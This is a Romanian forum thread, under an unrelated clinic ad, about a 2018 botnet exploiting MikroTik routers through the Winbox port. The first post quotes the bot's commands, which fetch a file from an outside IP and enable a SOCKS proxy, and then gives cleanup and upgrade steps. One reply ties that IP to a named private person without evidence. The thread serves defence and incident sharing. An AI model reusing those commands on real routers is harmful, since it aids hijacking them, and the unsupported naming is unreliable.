Chirurgia endoscopică a hipofizei
"Standardul de aur" în chirurgia hipofizară îl reprezintă endoscopia transnazală transsfenoidală. Echipa NeuroHope este antrenată în unul din cele mai mari centre de chirurgie a hipofizei din Europa, Spitalul Foch din Paris, centrul în care a fost introdus pentru prima dată endoscopul în chirurgia transnazală a hipofizei, de către neurochirurgul francez Guiot. Pe lângă tumorile cu origine hipofizară, prin tehnicile endoscopice transnazale pot fi abordate numeroase alte patologii neurochirurgicale. www.neurohope.ro |
Mikrotik Alerta: Vulnerabilitatea portului Winbox (8291)!
Last Updated: Jul 31 2018 20:02, Started by
SpargatorulDeVise
, Jul 22 2018 13:17
·
0
#1
Posted 22 July 2018 - 13:17
A inceput de vreo doua zile.. A vazut cineva asta?
Cineva, (un bot) se conectează si face următoarele: /tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http /ip socks> print enabled: yes port: 4145 connection-idle-timeout: 2m max-connections: 200 fisierul mikrotik.php este gol WinBox > IP> Socks > disable WinBox > System >Scripts si stergeti "script1_" Upradati de urgenta RouterOS la versiunea curenta v6.42.6! Schimbati parola de admin si reboot WinBox > System > Routerboard > Upgrade [ https://i.imgur.com/VpJyXhz.png - Pentru incarcare in pagina (embed) Click aici ] Edited by SpargatorulDeVise, 22 July 2018 - 13:23. |
#2
Posted 22 July 2018 - 13:26
as schimba, da' n-am mikrotik, rulez dd-wrt
anyway, care-i ala de are activ web management pe router? p.s. ai uitat sa pui sursa |
#3
Posted 22 July 2018 - 13:37
gumball3000, on 22 iulie 2018 - 13:26, said:
as schimba, da' n-am mikrotik, rulez dd-wrt anyway, care-i ala de are activ web management pe router? p.s. ai uitat sa pui sursa In aprilie a aparut exploit pentru interfata web a echipamentelor mikrotik. Acum a aparut exploit pentru portul WinBox 8291 De ieri dimineata botnetul a inceput sa scaneze si sa escaladeze privilegii in retelele Telekom Romania si apoi RCS & RDS. Am un amic cu doua echipamente afectate de exploit. Singurele informatii despre victime le-am gasit pe : vk .com/mikrotik_os?w=wall-26469243_149490 |
#5
Posted 22 July 2018 - 16:04
unbrutus, on 22 iulie 2018 - 15:26, said:
Ceva anunt pe mikrotik.ro? Ciudat este ca la data de 23.04.2018 au postat despre vulnerabilitatea webui si acum au modificat continutul anuntului dar nu si data. In fine.. Au trimis si e-mail la membri in perioada aia cu urmatorul continut: " Conform informatiilor primite recent de la Mikrotik.com, un botnet periculos scaneaza in prezent adresele IP publice pentru a gasi porturi WinBox (8291) și WWW (80) deschise, si poate exploata o vulnerabilitate a serverului web www de pe RouterOS astfel compromitand sistemul. Acesta vulnerabilitate a fost patch-uita in urma cu un an de zile, in versiunea RouterOS v6.38.5( martie 2017). Daca routerul dv. este direct expus pe Internet (are IP public, este accesibil de pe Internet) este indicat sa upgradati de urgenta la ultima versiune curenta RouterOS v6.41.3 din Quickset / "Check for updates". Mai multe informatii gasiti pe forumul oficial Mikrotik: https://forum.mikrotik.com/viewtopic.php?f=21&t=132499 Indicatii pentru securizarea routerului: sa aveti o parola (complexa) pe userul admin sa activati optiunea Firewall, introdusa in Quickset dupa RouterOS v6.40, acest lucru impiedica accesarea routerului dv. din WAN(Internet) daca pentru configurare folositi winbox, serverul web www putand fi dezactivat din meniul /IP Services sau schimbat portul implicit 80 pe de ex. 8888 https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router " Edited by SpargatorulDeVise, 22 July 2018 - 16:08. |
#6
Posted 22 July 2018 - 16:45
unbrutus, on 22 iulie 2018 - 15:26, said:
Ceva anunt pe mikrotik.ro? Mikrotik nu are site oficial in romana . https://forum.mikrot...p?f=21&t=133533 Discutia asta a inceput in Aprilie . Cred ca ai ramas cu el de atunci . |
#7
Posted 22 July 2018 - 22:18
Nu este nimic,stirea este veche iar routerele Mikrotik n-au nici pe naiba!
Eu am versiunea asta: RouterOS v6.40.4 (stable) pe un MikroTik RB962UiGS-5HacT2HnT si n-o schimb sub nicio forma! Este sistem de operare nu simplu firmware ca la TP-LIN(gi)K sau Tenda! Am firewall-ul activat si reguli pe el. Pentru cei ce aveti MiktoTik - nu este nimic acum DPDV al amenintarilor informatice! Pentru siguranta DVS,schimbati-va periodic parola de admin si la regulile de firewall mai dati cate "o raita"! Prietenii stiu ce zic! |
#8
Posted 22 July 2018 - 23:08
Sunt vulnerabile versiunile pana la 6.43rc3 (inclusiv): https://forum.mikrot...ic.php?t=133533
Daca tu crezi ca e OK sa ramai cu 6.40.4, treaba ta. |
#9
Posted 23 July 2018 - 00:45
Alice, on 22 iulie 2018 - 23:08, said:
Sunt vulnerabile versiunile pana la 6.43rc3 (inclusiv): https://forum.mikrot...ic.php?t=133533 Daca tu crezi ca e OK sa ramai cu 6.40.4, treaba ta. Si daca intra la mine pe retea... ca sa-mi ia? Boii de la bicicleta? Sutele de mii de melodii... ca la asta sunt maniac... sa le ia pe toate! Am back-up la absolut tot pe HDD-uri externe neconectate in vreo retea si puse bine la pastrare.Refac tot de la zero fara probleme. Asa ca... hack-eri... face-ti-va de cap daca puteti intra la mine in reteaua casnica - pofiti va rog! |
#10
Posted 23 July 2018 - 23:13
Confirm. Vazut in log doua conexiuni ratate via WinBox, a treia oara conectat ca admin, a modificat socks-ul , a instalat scriptul si a pornit scheduler-ul. Aveam 6.39.3 si o parola simpla. Schimbat parola. Adresa 95.154.216.160 e a unui domeniu din anglia, ceva firma, un tip ionut mandoca, romanas
Preventiv am lasat Winbox-ul doar din lan... Attached FilesEdited by bonti, 23 July 2018 - 23:41. |
|
#12
Posted 24 July 2018 - 10:46
Facut la 6.40.8 bugfix. Ciudat cum penetreaza parola din 2 incercari...Probabil ar trebui schimbat si user-ul "admin" in ceva personalizat...Recomandari normis-mikrotik : https://wiki.mikroti...ing_Your_Router
|
#13
Posted 31 July 2018 - 20:02
Atacurile continua...noroc ca winboxul e permis doar in lan, sau update-ul de firmware, cine mai stie...
Attached Files |
Anunturi
▶ 0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users